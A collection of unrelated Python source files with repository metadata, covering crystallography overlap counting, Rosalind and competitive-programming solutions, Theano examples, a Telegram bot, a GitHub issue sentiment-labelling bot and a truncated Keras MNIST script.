"%f, %f, %f, %f, %f, %f, %f\n" % (r, tf, tb, f, b, fb, bf)
)
def write_output_total_shoebox(self, ratio_total, ratio_bg, ratio_fg, ratio_bg_fg):
"""This function writes a text file containing the average overlaps
per shoebox of the dataset.
:param float ratio_total: average total overlap ratio
:param float ratio_bg: average background overlap ratio
:param float ratio_fg: average foreground overlap ratio
:param float ratio_bg_fg: average background foreground overlap ratio
"""
text = [
"total overlap ratio:",
"foreground overlap ratio:",
"background overlap ratio:",
"background foreground overlap ratio:",
]
data = [ratio_total, ratio_fg, ratio_bg, ratio_bg_fg]
name_outfile = self.outputfile_t + "_shoebox.txt"
with open(name_outfile, "w") as outfile:
for t, d in zip(text, data):
outfile.write("%s, %f\n" % (t, d))
def prepare_data(self):
"""
This function extracts dimensions of the imageset the resolutions
per pixel and the minimum and maximum resolution of the imagesets from
the input file.
:returns: number of images, width and height of the images, minimum and maximum
resolutions and a resolution list per pixel
"""
# get input from expt file
experiments = ExperimentListFactory.from_json_file(self.inputfile)
assert len(experiments) == 1
imageset = experiments[0].imageset
beam = experiments[0].beam
detector = experiments[0].detector
panel = detector[0]
# get dimensions of the dataset
y_dim = imageset.get_raw_data(0)[0].all()[0]
x_dim = imageset.get_raw_data(0)[0].all()[1]
z_dim = len(imageset)
print("Number of images in dataset:", z_dim)
# write resolution array
resolution = self.np_resolution(x_dim, y_dim, panel, beam)
print("Read in resolutions.")
# get vmin, vmx and number of bins
vmin = np.amin(resolution)
vmax = np.amax(resolution)
return z_dim, y_dim, x_dim, vmin, vmax, resolution
def count_overlaps_per_reflection(self):
"""
The function that counts overlaps per reflection.
:returns:total overlpas ratio per shoebox, foreground overlap
ratio per shoebox, background overlap ratio per shoebox,
background/foredround overlap per shoebox
"""
start_main = timer()
# get dimensions of imageset and resolution values
z_dim, y_dim, x_dim, vmin, vmax, resolution = self.prepare_data()
# prepare the bins
num_bins = self.num_bins
d2_list, intervall = self.prepare_bins_shoebox(vmax, vmin, num_bins)
# prepare the lists containing the overall overlap counts and ratios
ratio_fg_fg = [0] * num_bins
ratio_fg_bg = [0] * num_bins
ratio_bg_fg = [0] * num_bins
ratio_bg_bg = [0] * num_bins
ratio_total_f = [0] * num_bins
ratio_total_b = [0] * num_bins
sum_fg_fg = [0] * num_bins
sum_fg_bg = [0] * num_bins
sum_bg_fg = [0] * num_bins
sum_bg_bg = [0] * num_bins
sum_total_f = [0] * num_bins
sum_total_b = [0] * num_bins
# loop through all images
for z in range(z_dim):
start = timer()
filename = "shoeboxes_" + str(z) + ".pickle"
# get shoeboxes and resolutions from pickle file
reflections = flex.reflection_table.from_pickle(filename)
resolution = reflections["d"].as_numpy_array()
d2_shoebox = np.array(map(lambda d: 1 / (d ** 2), resolution))
shoebox = reflections["shoebox"]
no_shoeboxes = len(shoebox)
# assign shoeboxes to resolution bins
index_array, weight = self.assign_shoebox_to_resolution_bin(
d2_shoebox, vmin, vmax, intervall
)
# count overlpas for each shoebox
fg_fg, fg_bg, bg_fg, bg_bg = self.write_overlaps_per_shoebox(
reflections, shoebox, y_dim, x_dim, z
)
# prepare lists containg overlap counts and ratio per image
ratio_fg_fg_im = [0] * num_bins
ratio_fg_bg_im = [0] * num_bins
ratio_bg_fg_im = [0] * num_bins
ratio_bg_bg_im = [0] * num_bins
ratio_total_f_im = [0] * num_bins
ratio_total_b_im = [0] * num_bins
sum_fg_fg_im = [0] * num_bins
sum_fg_bg_im = [0] * num_bins
sum_bg_fg_im = [0] * num_bins
sum_bg_bg_im = [0] * num_bins
sum_total_f_im = [0] * num_bins
sum_total_b_im = [0] * num_bins
# add counts to resolution bins
for f, fb, bf, b, i in zip(fg_fg, fg_bg, bg_fg, bg_bg, index_array):
if weight[i] > 0:
ratio_fg_fg_im[i] += f / weight[i]
ratio_fg_bg_im[i] += fb / weight[i]
ratio_bg_fg_im[i] += bf / weight[i]
ratio_bg_bg_im[i] += b / weight[i]
ratio_total_f_im[i] += (f + fb + b) / weight[i]
ratio_total_b_im[i] += (f + bf + b) / weight[i]
sum_fg_fg_im[i] += f
sum_fg_bg_im[i] += fb
sum_bg_fg_im[i] += bf
sum_bg_bg_im[i] += b
sum_total_f_im[i] += f + fb + b
sum_total_b_im[i] += f + bf + b
ratio_fg_fg[i] += f / (weight[i] * z_dim)
ratio_fg_bg[i] += fb / (weight[i] * z_dim)
ratio_bg_fg[i] += bf / (weight[i] * z_dim)
ratio_bg_bg[i] += b / (weight[i] * z_dim)
ratio_total_f[i] += (f + fb + b) / (weight[i] * z_dim)
ratio_total_b[i] += (f + bf + b) / (weight[i] * z_dim)
sum_fg_fg[i] += f / (z_dim)
sum_fg_bg[i] += fb / (z_dim)
sum_bg_fg[i] += bf / (z_dim)
sum_bg_bg[i] += b / (z_dim)
sum_total_f[i] += (f + fb + b) / (z_dim)
sum_total_b[i] += (f + bf + b) / (z_dim)
# calculate overall overlap ratios of the current image
overall_ratio_fg_fg_im = sum(sum_fg_fg_im) / no_shoeboxes
overall_ratio_fg_bg_im = sum(sum_fg_bg_im) / no_shoeboxes
overall_ratio_bg_fg_im = sum(sum_bg_fg_im) / no_shoeboxes
overall_ratio_bg_bg_im = sum(sum_bg_bg_im) / no_shoeboxes
overall_ratio_total_im = sum(sum_total_f_im) / no_shoeboxes
end = timer()
# print output
print("Image no.:", z + 1)
print("No. of shoeboxes:", no_shoeboxes)
print("total overlap ratio per shoebox", overall_ratio_total_im)
print("foreground overlap ratio per shoebox", overall_ratio_fg_fg_im)
print("background overlap ratio per shoebox", overall_ratio_bg_bg_im)
print(
"foreground background overlap ratio per shoebox",
overall_ratio_fg_bg_im,
)
print(
"background foreground overlap ratio per shoebox",
overall_ratio_bg_fg_im,
)
print("Time taken: ", end - start)
# calculate overall overlap ratios of the whole dataset
overall_ratio_fg_fg = sum(sum_fg_fg) / no_shoeboxes
overall_ratio_fg_bg = sum(sum_fg_bg) / no_shoeboxes
overall_ratio_bg_fg = sum(sum_bg_fg) / no_shoeboxes
overall_ratio_bg_bg = sum(sum_bg_bg) / no_shoeboxes
overall_ratio_total = sum(sum_total_f) / no_shoeboxes
end_main = timer()
# print output
print("Overlap statistics for whole dataset:")
print("total overlap ratio per shoebox", overall_ratio_total)
print("foreground overlap ratio per shoebox", overall_ratio_fg_fg)
print("background overlap ratio per shoebox", overall_ratio_bg_bg)
print("foreground background overlap ratio per shoebox", overall_ratio_fg_bg)
print("background foreground overlap ratio per shoebox", overall_ratio_bg_fg)
# write output files
self.write_output_lists_shoebox(
d2_list,
ratio_total_f,
ratio_total_b,
ratio_bg_bg,
ratio_fg_fg,
ratio_fg_bg,
ratio_bg_fg,
)
self.write_output_total_shoebox(
overall_ratio_total,
overall_ratio_bg_bg,
overall_ratio_fg_fg,
overall_ratio_bg_fg,
)
print("Time taken for imageset: ", end_main - start_main)
return (
overall_ratio_total,
overall_ratio_fg_fg,
overall_ratio_bg_bg,
overall_ratio_bg_fg,
)
def count_overlaps_per_pixel(self):
"""The function that counts the overlaps per pixel on an image dataset.
:returns: overall averages for the whole imageset (total, bg, fg, bg_fg)
"""
start_main = timer()
z_dim, y_dim, x_dim, vmin, vmax, resolution = self.prepare_data()
print(x_dim, y_dim)
num_bins = self.num_bins
# get bin labels(middle of resolution range) array with size of image with
# indices of bin the resolution is in and weight of each bin
d2_list, index_array, weight = self.prepare_bins_pixel(
vmax, vmin, num_bins, resolution
)
print("Prepared bins.")
count_bg = [0] * num_bins
count_fg = [0] * num_bins
count_bg_fg = [0] * num_bins
count_total = [0] * num_bins
# loop through all images
for z in range(z_dim):
start = timer()
filename = "shoeboxes_" + str(z) + ".pickle"
# get shoeboxes from pickle file
reflections = flex.reflection_table.from_pickle(filename)
shoebox = reflections["shoebox"]
# write masks of background of shoeboxes and foreground of shoeboxes
n_background, n_foreground = self.write_bg_and_fg_mask(
reflections, shoebox, y_dim, x_dim, z
)
# prepare lists that will contain count of different kinds of overlap
# per resolution bin for the current image
count_bg_im = [0] * len(d2_list)
count_fg_im = [0] * len(d2_list)
count_bg_fg_im = [0] * len(d2_list)
# fill lists of overlap counts
for bg, fg, index in itertools.izip(
n_background.reshape(-1), n_foreground.reshape(-1), index_array
):
count_bg_im[index] += bg * (bg - 1) / 2
count_fg_im[index] += fg * (fg - 1) / 2
count_bg_fg_im[index] += bg * fg
bg_ratio_im = []
fg_ratio_im = []
bg_fg_ratio_im = []
total_ratio_im = []
bin = 0
# calculate ratios of overlaps (no. of overlaps in bin/no. of pixels in bin)
# add count of overlaps of image to overall counts
for b, f, bf, w in zip(count_bg_im, count_fg_im, count_bg_fg_im, weight):
bg_ratio_im.append(b / w)
fg_ratio_im.append(f / w)
bg_fg_ratio_im.append(bf / w)
total_ratio_im.append(b / w + f / w + bf / w)
count_fg[bin] += f
count_bg[bin] += b
count_bg_fg[bin] += bf
count_total[bin] += b + f + bf
bin += 1
# print output
print("Image no.:", z + 1)
print("No. of shoeboxes:", len(shoebox))
print(
"total overlap ratio",
(sum(count_bg_im) + sum(count_fg_im) + sum(count_bg_fg_im))
/ sum(weight),
)
print("foreground overlap ratio", sum(count_fg_im) / sum(weight))
print("background overlap ratio", sum(count_bg_im) / sum(weight))
print(
"background foreground overlap ratio", sum(count_bg_fg_im) / sum(weight)
)
end = timer()
print("Time taken for image:", end - start)
# ratio of overlaps per resolution bin
ratio_total = []
ratio_bg = []
ratio_fg = []
ratio_bg_fg = []
for t, b, f, bf, w in zip(count_total, count_bg, count_fg, count_bg_fg, weight):
ratio_total.append(t / (w * z_dim))
ratio_bg.append(b / (w * z_dim))
ratio_fg.append(f / (w * z_dim))
ratio_bg_fg.append(bf / (w * z_dim))
# calculate the average overlap ratios for the dataset
ratio_total_dataset = (sum(count_bg) + sum(count_fg) + sum(count_bg_fg)) / (
sum(weight) * z_dim
)
ratio_fg_dataset = sum(count_fg) / (sum(weight) * z_dim)
ratio_bg_dataset = sum(count_bg) / (sum(weight) * z_dim)
ratio_bg_fg_dataset = sum(count_bg_fg) / (sum(weight) * z_dim)
end_main = timer()
# print output
print("Overlap statistics for whole dataset:")
print("total overlap ratio", ratio_total_dataset)
print("foreground overlap ratio", ratio_fg_dataset)
print("background overlap ratio", ratio_bg_dataset)
print("background foreground overlap ratio", ratio_bg_fg_dataset)
# write output files
self.write_output_lists_pixel(
d2_list, ratio_total, ratio_bg, ratio_fg, ratio_bg_fg
)
self.write_output_total_pixel(
ratio_total_dataset, ratio_bg_dataset, ratio_fg_dataset, ratio_bg_fg_dataset
)
print("Time taken for dataset:", end_main - start_main)
return (
ratio_total_dataset,
ratio_fg_dataset,
ratio_bg_dataset,
ratio_bg_fg_dataset,
)
def main(self):
if self.run_shoeboxes:
total, fg, bg, bg_fg = self.count_overlaps_per_reflection()
else:
total, fg, bg, bg_fg = self.count_overlaps_per_pixel()
return total, fg, bg, bg_fg
def run():
"""Allows overlapping_spots to be called from command line."""
import argparse
parser = argparse.ArgumentParser(description="command line argument")
parser.add_argument(
"--inputfile",
dest="inputfile",
type=str,
help="The name of the json file that contains the reflection table.",
default="13_integrated.expt",
)
parser.add_argument(
"--num_bins",
dest="num_bins",
type=int,
help="The number of resolution bins",
default=50,
)
parser.add_argument(
"--outputfile_l",
dest="outputfile_l",
type=str,
help="The name of the output file that contains the lists of the overlaps per resolution bin.",
default="overlap_lists",
)
parser.add_argument(
"--outputfile_t",
dest="outputfile_t",
type=str,
help="The name of the output file that contains the average overlaps of the dataset",
default="overlap_total",
)
parser.add_argument(
"--run_shoeboxes",
dest="run_shoeboxes",
type=bool,
help="The boolean which decides whether overlaps per shoebox should be run.",
default=True,
)
parser.add_argument(
"--run_pixel",
dest="run_shoeboxes",
help="Sets run_shoeboxes to false.",
action='store_false',
)
args = parser.parse_args()
overlap_counter = OverlapCounter(
args.inputfile,
args.num_bins,
args.outputfile_l,
args.outputfile_t,
args.run_shoeboxes,
)
overlap_counter.main()
if __name__ == "__main__":
run()
| true |
f062ca3ae0bdae0412c8da652896e108764d9054
|
Python
|
gittenberg/rosalind
|
/Finding a Shared Motif.py
|
UTF-8
| 810 | 3.140625 | 3 |
[] |
no_license
|
# https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Longest_common_substring#Python_3
from Bio import SeqIO
input_file = 'rosalind_lcsm.txt'
with open(input_file) as f:
fasta_sequences = list(SeqIO.parse(f, 'fasta'))
sequences = [str(fasta.seq) for fasta in fasta_sequences]
def long_substr(data):
substr = ''
if len(data) > 1 and data[0]:
for i in range(len(data[0])):
for j in range(len(data[0]) - i + 1):
if j > len(substr) and is_substr(data[0][i: i + j], data):
substr = data[0][i: i + j]
return substr
def is_substr(find, data):
if len(data) < 1 and len(find) < 1:
return False
for dat in data:
if find not in dat:
return False
return True
print(long_substr(sequences))
| true |
4008b2b25e909f87aa36747e74371b26692549f9
|
Python
|
Lirein/vosk-server
|
/websocket/test_gram.py
|
UTF-8
| 3,474 | 2.828125 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env python3
import os
import sys
import pathlib
import random
import re
def readFile(path: str) -> tuple:
read_data = []
with open(path, "r") as f:
read_data = f.readlines()
return read_data
def parseGram(grammar: tuple) -> dict:
gramdata = {}
publicgrams = {}
for line in grammar:
line = line.strip()
if line.startswith('<') and line.find('=') != -1 and line.find(';') != -1:
key = line[1:line.index('>')]
value = line[line.index('=')+1:line.index(';')].strip()
value = value.replace('*', '.*')
# value = value.replace(')', '){1}')
value = value.replace('[', '(')
value = value.replace(']', '){0,1}')
start = 0
while(value.find('<', start)!=-1 and value.index('>', start)!=-1):
gram = value[value.index('<', start)+1:value.index('>', start)].strip()
gramregexp = gramdata.pop(gram)
start = value.index('<', start)
value = value.replace(value[start:value.index('>', start)+1], '(' + gramregexp + ')')
start += len(gramregexp)+1
value = value.strip()
if value[-1] == '|':
value = value[0:-1]
value = value.replace('(', '(<')
value = value.replace(')', '>)')
value = value.replace(' ', '><')
value = value.replace(')>', ')')
value = value.replace('<|', '|')
value = value.replace('|>', '|')
value = value.replace('<(', '(')
value = value.replace('}>', '}')
value = value.replace('<<', '<')
value = value.replace('>>', '>')
if not value[0] in ['(', '<']:
value = '<' + value
if not value[-1] in [')', '}', '>']:
value = value + '>'
value = value.replace('<', '\\s*\\b')
value = value.replace('>', '\\b\\s*')
value = value.replace('\\b\\b', '\\b')
value = value.replace('\\b\\s*\\b', '\\b')
gramdata[key] = value
if line.startswith('public ') and line.find('=') != -1 and line.find(';') != -1:
key = line[line.index('<')+1:line.index('>')]
value = line[line.index('=')+1:line.index(';')].strip()
grams = []
while(value.find('<')!=-1 and value.index('>')!=-1):
gram = value[value.index('<')+1:value.index('>')].strip()
grams.append(gram)
value = value.replace(value[value.index('<'):value.index('>')+1], '')
publicgrams[key] = grams
return gramdata, publicgrams
def testPhrase(phrase: str, grams: dict, validgrams: tuple):
matchedgram = 'unknown'
for gram in validgrams:
pattern = re.compile(grams[gram])
if pattern.search(phrase):
matchedgram = gram
break
return matchedgram
phrases = ['соединение установлено пожалуйста подождите', 'я вас слушаю внимательно', 'по какой рекламе']
file = readFile(str(pathlib.Path(__file__).parent.absolute().joinpath('test.gram')))
grams, publicgrams = parseGram(file)
phrase = phrases[random.randint(0, len(phrases)-1)]
print('Test pharse '+phrase)
for variant in publicgrams:
print('Variant '+variant+': '+testPhrase(phrase, grams, publicgrams[variant]))
| true |
004e09d1fd8687702d589e52b9190c9d9e534525
|
Python
|
beatrizgoa/TFM
|
/LearningTheano/Ejemplos_sencillos_theano.py
|
UTF-8
| 2,929 | 3.5625 | 4 |
[] |
no_license
|
import theano
import theano.tensor as T
print '----------------------'
print 'Funcion'
print '---------------------'
###################
#FUNCIoN LOGISTICA:
###################
#Se define la variable simbolica en forma de matriz
x = T.dmatrix('x')
#Se define la sigmoide
s = 1 / (1 + T.exp(-x))
#Se crea la funciOn donde la entrada es x y la salida es la
#salida de la funcion
logistic = theano.function([x], s)
#Se le pasa una matriz a la funcion simbolica
RES=logistic([[0, 1], [-1, -2]])
print 'Se muestra el resultado de la funcion logistica'
print RES
print '----------------------'
print 'Varias salidas'
print '---------------------'
############################
#FUNCIONES CON VARIAS SALIDAS
############################
#Se definen variables
M=T.dmatrix('M')
N=T.dmatrix('N')
#Tambien se pueden definir asi:
M,N=T.dmatrices('M','N')
dif1=M-N
dif2=abs(M-N)
dif3=(M-N)**2 #El cuadrado de un numero se hace con ** y no con ^
#Se crea la funcion
diferencias=theano.function(inputs=[M,N], outputs=[dif1,dif2,dif3])
#Se le pasan los argumentos a la funcion
res2=diferencias([[1, 1], [1, 1]], [[0, 1], [2, 3]])
print 'Mostramos dif1'
print res2[0]
print 'Mostramos dif2'
print res2[1]
print 'Mostramos dif3'
print res2[2]
print '----------------------'
print 'Argumentos por defecto'
print '---------------------'
###############################
#PONER POR DEFECTO ARGUMENTOS
################################
#Para definir las variables tambien se pueden definir juntas
x, y,w = T.dscalars('x', 'y','w')
#Operacion:
z = (x + y) * w
#funcion
f = theano.function([x, theano.Param(y, default=1), theano.Param(w, default=2, name='w_by_name')], z)
#La y se le asigna por defecto 1, se le asigna a la entrada.
print 'entrada unica con x=10, Por defecto y=1, w=2'
r1=f(10)
print r1
print'entrada con x=10 y=5, Por defecto w=2'
r2=f(10,5)
print r2
print 'entrada con x=10 y=5 y w=1'
r3=f(10,5,w_by_name=1)
print r3
#Si se crea otra funcion y quieers llamarle a w de otra manera:
prueba=x+y+w
f2 = theano.function([x, theano.Param(y, default=3), theano.Param(w, default=2, name='Valor_w')], prueba)
print 'entrada con x=10 y=5 y w=1 en prueba'
hola=f2(10,5,Valor_w=1)
print hola
print '----------------------'
print 'variables compartidas'
print '---------------------'
#########################################
#VARIABLES COMPARTIDAS (SHARED VARIABLES)
#########################################
#Se crea la variable compartida inicializandola a cero
state = theano.shared(0)
inc = T.iscalar('inc')
acumulador = theano.function([inc], state, updates=[(state, state+inc)])
decrecesor= theano.function([inc], state, updates=[(state, state-inc)])
#Las funciones coje inc, devuelve su salida es state, y state cambia su valor de state a state + inc
a=state.get_value()
print a
aa=acumulador(2)
print aa
a=state.get_value()
print a
aa=acumulador(3)
print aa
bb=decrecesor(2)
print bb
a=state.get_value()
print a
| true |
1b68affb3d87351c40f3d3472ba14c0698ce40bb
|
Python
|
AdamZhouSE/pythonHomework
|
/Code/CodeRecords/2417/60734/265174.py
|
UTF-8
| 265 | 2.859375 | 3 |
[] |
no_license
|
lst = list(map(int,input().split(',')))
max_n = min(lst)
flag = True
for i in range(2,max_n+1):
count = 0
for index in range(len(lst)):
if lst[index]%i == 0:
count+=1
if count==len(lst):
flag = False
break
print(flag)
| true |
17f79789fb4dbfa4a050cbf0f499e6570b70182d
|
Python
|
hitaitengteng/mytool
|
/自然语言处理/textcompareutil.py
|
UTF-8
| 347 | 2.75 | 3 |
[] |
no_license
|
from difflib import Differ
a="17.3如发包方有证据认为承包方无法完全履行本合同而承包方无法提供有效的担保时,"
b="173如发包方有证虽“为采包方无法完全用行木合同而承包方无法提供有效的担保时"
d = Differ()
diff = d.compare(a.splitlines(), b.splitlines())
print('\n'.join(list(diff)))
| true |
2274b2b394702b0c8f403492c66bc98f54ccba40
|
Python
|
tjsdud594/BasicClass
|
/06.Crawling/4.selenium/step03mypagesearch.py
|
UTF-8
| 634 | 3.15625 | 3 |
[] |
no_license
|
# 미션 : 구글에서 검색 가능하게 step01 처럼 작업 권장
from selenium import webdriver
import time # 실행을 잠시 중지(sleep(초단위))
driver = webdriver.Chrome("c:/driver/chromedriver")
driver.get("http://127.0.0.1:5500/4.selenium/step03mypage.html")
# input tag
search_box = driver.find_element_by_name("data")
# button tag
# 검색버튼 찾기
btn = driver.find_element_by_id("btn") # id속성으로 찾는 함수
search_box.send_keys("encore")
# search_box.send_keys("hihihi")
# 검색버튼 클릭시에 실행되는 js 함수 호출 코드
btn.click()
time.sleep(10)
driver.quit()
| true |
d9281e89c000a3b6511793b74caab0d1aee7297d
|
Python
|
artemii-yanushevskyi/RemoteRetail
|
/TelegramBots/AsyncTelegramPython.py
|
UTF-8
| 3,150 | 2.53125 | 3 |
[] |
no_license
|
"""
This is a echo bot.
It echoes any incoming text messages.
"""
import asyncio
import logging, time
from aiogram import Bot, Dispatcher, executor, types, exceptions
# to run aiogram we should create
# a new environment 'conda create --name py36 python=3.6' (/anaconda3/envs/py37)
# to activate it 'conda activate py37'
from bot_token import bot_token as BOT_TOKEN
# Configure logging
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('broadcast')
# Initialize bot and dispatcher
bot = Bot(token=BOT_TOKEN, parse_mode='Markdown')
dp = Dispatcher(bot)
# User Settings
CHAT_ID = -378550435 # the PythonTelegram Group
affirmative = ['мерси', 'thanks', 'ok', '👌', '👍']
messages_bot = []
current_time = time.asctime(time.localtime(time.time()))
# Handlers
@dp.message_handler(commands=['start', 'help'])
async def send_welcome(message: types.Message):
"""
This handler will be called when client send `/start` or `/help` commands.
"""
intro_message = '*The bot had been started.* Current date and time\n_%s_' % current_time
await message.reply(intro_message)
async def send_message(user_id: int, text: str, disable_notification: bool = False) -> types.Message:
"""
Safe messages sender
:param user_id:
:param text:
:param disable_notification:
:return:
"""
try:
msg = await bot.send_message(user_id, text, disable_notification=disable_notification)
except exceptions.BotBlocked:
log.error(f"Target [ID:{user_id}]: blocked by user")
except exceptions.ChatNotFound:
log.error(f"Target [ID:{user_id}]: invalid user ID")
except exceptions.RetryAfter as e:
log.error(f"Target [ID:{user_id}]: Flood limit is exceeded. Sleep {e.timeout} seconds.")
await asyncio.sleep(e.timeout)
return await send_message(user_id, text) # Recursive call
except exceptions.UserDeactivated:
log.error(f"Target [ID:{user_id}]: user is deactivated")
except exceptions.TelegramAPIError:
log.exception(f"Target [ID:{user_id}]: failed")
else:
log.info(f"Target [ID:{user_id}]: success")
return msg
return msg
@dp.message_handler(regexp='(^dog[s]?$|hound)')
async def dog(message: types.Message):
with open('data/dog.jpg', 'rb') as photo:
await bot.send_photo(message.chat.id, photo, caption='Dog is here 🐶',
reply_to_message_id=message.message_id)
@dp.message_handler(regexp='(^timer ?$)')
async def timer(message: types.Message):
timer = 300
msg = await send_message(message.chat.id, 'Start timer: %d' % timer)
try:
while True:
if await bot.edit_message_text('timer: %d' % timer, msg.chat.id, msg.message_id):
timer -= 1
# await asyncio.sleep(1)
if timer == 0:
break
finally:
timer = 300
log.info(f"{timer} messages successful sent.")
@dp.message_handler()
async def echo(message: types.Message):
await bot.send_message(message.chat.id, message.text)
if __name__ == '__main__':
executor.start_polling(dp, skip_updates=True)
| true |
bfb4ab1330697ec65392963bd8e25cad45bd345b
|
Python
|
SaraWestWA/TwitOff_SW
|
/twitoff/round_one/app_old.py
|
UTF-8
| 3,019 | 2.75 | 3 |
[
"MIT"
] |
permissive
|
'''"""'''
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
from dotenv import load_dotenv
import os
from .db_model import DB, User, Tweet
from .twitter import add_user_tweepy, update_all_users
from .predict import predict_user
import traceback
load_dotenv()
def create_app():
'''Create and configure an instance of the Flask application.'''
app = Flask(__name__)
app.config.update(
SQLALCHEMY_DATABASE_URI=os.getenv('DATABASE_URL'),
SQLALCHEMY_TRACK_MODIFICATIONS=os.getenv('TRACK_MODS')
)
DB.init_app(app) #connect Flask app to SQAlchemy DB
@app.route('/')
def root():
return render_template('base.html', title='Home',users=User.query.all())
@app.route('/user', methods=['POST'])
@app.route('/user/<name>', methods=['GET'])
def user(name=None, message=''):
name = name or request.values['username']
try:
if request.method == 'POST':
name = request.values['user_name']
print('Name: ',name)
if name == '':
message = 'Please select or enter a user name.'
tweets = []
else:
add_user_tweepy(name)
message = 'Tweets by {}!'.format(name)
tweets = User.query.filter(User.username == name).one().tweet
else:
tweets = User.query.filter(User.name == name).one().tweet
except Exception as e:
traceback.print_exc()
message = f'''Error adding {name}. Is the name on the user list in any form?
Just click it.
If not, user may not exist, check spelling and try again.'''
tweets = []
return render_template('user.html', title=name, tweets=tweets, message=message)
# @app.route('/compare', methods=['POST'])
# def compare(message =''):
# user1 = request.values['user1']
# user2 = request.values['user2']
# tweet_text = request.values['tweet_text']
# if user1 == user2:
# message = 'Two different users must be provided to compare!'
# else:
# prediction = predict_user(user1, user2, tweet_text)
# message = f''' "{tweet_text} " is more likely to be said by {user1 if prediction else user2}
# than {user2 if prediction else user1}'''
# return render_template('predict.html', title='Prediction', message=message)
@app.route('/reset')
def reset():
DB.drop_all()
DB.create_all()
return render_template('base.html', title='Database has been reset!', users=User.query.all())
@app.route('/update', methods=['GET'])
def update():
update_all_users()
return render_template('base.html', title='All tweets updated!', users=User.query.all())
return app
# if __name__ == "__main__":
# app.run(debug=True)
"""
| true |
bb4ec6c8ae33056f681450fe4e2e69730b9b0544
|
Python
|
Aasthaengg/IBMdataset
|
/Python_codes/p03337/s732659715.py
|
UTF-8
| 66 | 2.9375 | 3 |
[] |
no_license
|
a,b=map(int,input().split())
ans=max(a+b,a-b)
print(max(ans,a*b))
| true |
12fd64dc24c1a8d967b9249f90ef55dbdb4eb40a
|
Python
|
Flood1993/ProjectEuler
|
/p433.py
|
UTF-8
| 421 | 3.09375 | 3 |
[] |
no_license
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 11:39:15 2013
@author: guillermo
"""
cont = 0
def gcd(n, m):
global cont
cont += 1
if n == m:
return
elif m > n:
return gcd(m, n)
# elif m == 1:
# return
elif n%m != 0:
return gcd(n, n%m)
benchmark = 11000
for i in range(1, benchmark):
for j in range(1, benchmark):
gcd(i, j)
print cont
| true |
a8a9a2df9e80ee45868c8b1ed1e65fba290f3fb3
|
Python
|
jaggergit/bot-tester
|
/issue-bot/handler.py
|
UTF-8
| 2,380 | 2.765625 | 3 |
[] |
no_license
|
import requests, json, os, sys
from github import Github
def handle(req):
"""handle a request to the function
Args:
req (str): request body
"""
event_header = os.getenv("Http_X_Github_Event")
req_user_agent = os.getenv("Http_User_Agent")
sys.stderr.write("User Agent: " + req_user_agent + "\n")
if not event_header == "issues":
sys.exit("Unexpected X-GitHub-Event: " + event_header)
gateway_hostname = os.getenv("gateway_hostname", "gateway")
#Converts JSON to Python objects
payload = json.loads(req)
if not payload["action"] == "opened":
sys.stderr.write("payload action != open .. exiting \n")
return
#sentimentanalysis invokation
res = requests.post('http://' + gateway_hostname + ':8080/function/sentimentanalysis', data=payload["issue"]["title"]+" "+payload["issue"]["body"])
sys.stderr.write("post call to sentimentanalysis - return code: " + str(res.status_code) + "\n")
if not res.status_code == 200:
sys.exit("Error from sentimentanalysis")
sys.stderr.write("Json Response to Sever:\n" + str(res.json()) + "\n")
positive_threshold = os.getenv("positive_threshold", "0,2")
polarity = res.json()['polarity']
# Call back to Github to apply the label.
apply_label(polarity,
payload["issue"]["number"],
payload["repository"]["full_name"],
positive_threshold)
return "Repo: %s, issue: %s, polarity: %f" % (payload["repository"]["full_name"], payload["issue"]["number"], polarity)
def apply_label(polarity, issue_number, repo, positive_threshold):
sys.stderr.write("->apply_label() polarity: %f issue# %s Repo: %s Threshold: %s \n" % (polarity, issue_number, repo, positive_threshold))
g = Github(os.getenv("auth_token"))
repo = g.get_repo(repo)
issue = repo.get_issue(issue_number)
has_label_positive = False
has_label_review = False
for label in issue.labels:
if label == "positive":
has_label_positive = True
if label == "review":
has_label_review = True
if polarity > float(positive_threshold) and not has_label_positive:
issue.set_labels("positive")
sys.stderr.write("Setting Positive Labe\n")
elif not has_label_review:
issue.set_labels("review")
sys.stderr.write("Setting Review Labe\n")
| true |
52b0f51c044de8f7b47f895f3e8fcb8c78be7b59
|
Python
|
yskang/AlgorithmPractice
|
/baekjoon/python/teleport_station_18232.py
|
UTF-8
| 1,102 | 3.078125 | 3 |
[
"MIT"
] |
permissive
|
# Title: 텔레포트 정거장
# Link: https://www.acmicpc.net/problem/18232
import sys
from collections import deque, defaultdict
sys.setrecursionlimit(10 ** 6)
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def solution(n: int, m: int, s: int, e: int, stations: list):
visited = defaultdict(lambda: False)
visited[0] = True
visited[n+1] = True
queue = deque()
queue.append((s, 0))
visited[s] = True
while queue:
station, time = queue.popleft()
for child in stations[station]:
if not visited[child]:
queue.append((child, time+1))
visited[child] = True
if child == e:
return time+1
def main():
n, m = read_list_int()
s, e = read_list_int()
stations = [[i-1, i+1] for i in range(n+1)]
for _ in range(m):
x, y = read_list_int()
stations[x].append(y)
stations[y].append(x)
print(solution(n, m, s, e, stations))
if __name__ == '__main__':
main()
| true |
2a4c2a7bb90f0c55c24a875e95dd640fe99875f4
|
Python
|
MicherlaneSilva/ifpi-ads-algoritmos2020
|
/atividades/iteracao_WHILE/f3_q17_soma_inverso.py
|
UTF-8
| 636 | 4 | 4 |
[] |
no_license
|
def mostrar(cont_crescente, cont_decrescente, n):
if cont_crescente < n - 1:
print(f'{1}/{cont_decrescente} +', end = " ")
else:
print(f'{1}/{cont_decrescente} =')
def soma_inverso(n):
somatorio = 0
contador = 0
den = n
while contador < n:
somatorio += 1/ den
mostrar(contador, den, n)
contador += 1
den -= 1
return somatorio
def main():
print("SOMA DOS INVERSOS")
n = int(input('\nDigite o valor para N: '))
print("S =", end = " ")
print("\nS = %.2f"%soma_inverso(n))
main()
| true |
af4a5a78d5c2b01e89b02ce38f6dd5937126dcf9
|
Python
|
sunqianggg/alltools
|
/keras/mnist_mlp_compare.py
|
UTF-8
| 2,144 | 2.9375 | 3 |
[] |
no_license
|
#encoding:utf8
'''
compare NN to another classify approaches like (svm,regression).
'''
from keras.datasets import mnist
import numpy as np
from keras.utils import np_utils
from sklearn import svm
# the data, shuffled and split between train and test sets
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = X_train.reshape(60000, 784)
